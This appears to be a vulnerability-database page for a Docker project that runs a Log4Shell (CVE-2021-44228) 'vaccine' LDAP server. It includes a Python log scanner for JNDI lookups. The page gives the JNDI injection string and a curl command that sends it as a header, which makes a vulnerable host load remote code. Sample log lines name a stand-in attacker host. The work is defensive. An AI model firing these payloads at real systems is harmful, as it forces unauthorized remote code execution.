POC details: 9f460f6fb5af00225a761520ad548c1bb4ffa780

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j, and when that request is written to the log, remote code execution is triggered.
Description
docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228
Introduction
## Log4j Docker Vaccine

A containerized way to run the log4j vaccine offered by Cybereason

- https://github.com/Cybereason/Logout4Shell

### Make it go
Clone this repo:

```bash
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
```

Edit the containers.env file to hold an accurate private or public IP/DNS that your target can access. The default entry likely won't work for you!

Build and run the containers:

```bash
docker-compose -f docker-compose.yml -p vaccine up
```

You now have a listening LDAP server that will serve up the Log4jRCE class to inoculate a vulnerable log4j instance.

You can expose this to the internet (if you like) by using ngrok:
- https://dashboard.ngrok.com/get-started/setup

```bash
ngrok tcp 1389
```

You can point a vulnerable log4j instance at this server using the infamous JNDI input string:

```
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
```

## Testing
There is a purposefully vulnerable version of log4j in a container available at:
- https://github.com/christophetd/log4shell-vulnerable-app

You can follow their instructions to start it and use it for testing:

```bash
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```

And trigger the inoculation via:

```bash
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a}'
```
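The vulnerability description above says the lookup fires when the request is written to the log, so the same `${jndi:...}` string that triggers the inoculation is also what a defender should look for in application logs to confirm the vaccine reached the instance and to spot lookups pointing anywhere other than your own vaccine server. The following is an added example, not code from this repository or from Cybereason; the log lines and hostnames (`vaccine.example.internal`, `attacker.example`) are constructed for illustration, and the pattern only covers the plain lookup form shown on this page.

```python
import re
from typing import Dict, Iterable, List, Optional

# Matches the plain lookup form used on this page:
#   ${jndi:<scheme>://<host>[:<port>][/<path>]}
# Constructed regex for illustration; it does not handle obfuscated variants.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

# Constructed sample lines resembling what the vulnerable test app might log for
# the curl request above; hostnames are placeholders, not real infrastructure.
SAMPLE_LOG_LINES = [
    '127.0.0.1 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 '
    'X-Api-Version="1.0"',
    '127.0.0.1 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 '
    'X-Api-Version="${jndi:ldap://vaccine.example.internal:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 '
    'User-Agent="${jndi:rmi://attacker.example:1099/x}"',
]


def find_jndi_lookups(line: str) -> List[Dict[str, Optional[str]]]:
    """Return every JNDI lookup in one log line, with scheme/host/port/path split out."""
    return [m.groupdict() for m in JNDI_LOOKUP.finditer(line)]


def scan_lines(lines: Iterable[str], allowed_hosts: Iterable[str] = ()) -> List[Dict[str, Optional[str]]]:
    """Scan log lines and label each hit.

    A hit whose host is the vaccine server you configured in containers.env is
    'expected'; any other host is 'suspicious' and worth an incident ticket.
    """
    allowed = set(allowed_hosts)
    findings: List[Dict[str, Optional[str]]] = []
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            verdict = "expected" if hit["host"] in allowed else "suspicious"
            findings.append({"line": str(number), "verdict": verdict, **hit})
    return findings


if __name__ == "__main__":
    # Treat our own vaccine host as expected; everything else is flagged.
    for finding in scan_lines(SAMPLE_LOG_LINES, allowed_hosts={"vaccine.example.internal"}):
        print(finding)
```

Feed it the real access or application log instead of `SAMPLE_LOG_LINES`, and pass the IP or DNS name you put in `containers.env` as the allowed host; a "suspicious" verdict means a lookup was logged that did not come from your own vaccine run.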
File snapshot

```
[4.0K] /data/pocs/9f460f6fb5af00225a761520ad548c1bb4ffa780
├── [  25] containers.env
├── [4.0K] docker
│   ├── [ 217] Dockerfile-ldapserver
│   ├── [ 213] Dockerfile-webserver
│   ├── [ 165] start_ldapserver.sh
│   └── [  73] start_webserver.sh
├── [ 587] docker-compose.yml
├── [ 16K] LICENSE
└── [1.3K] README.md

1 directory, 8 files
```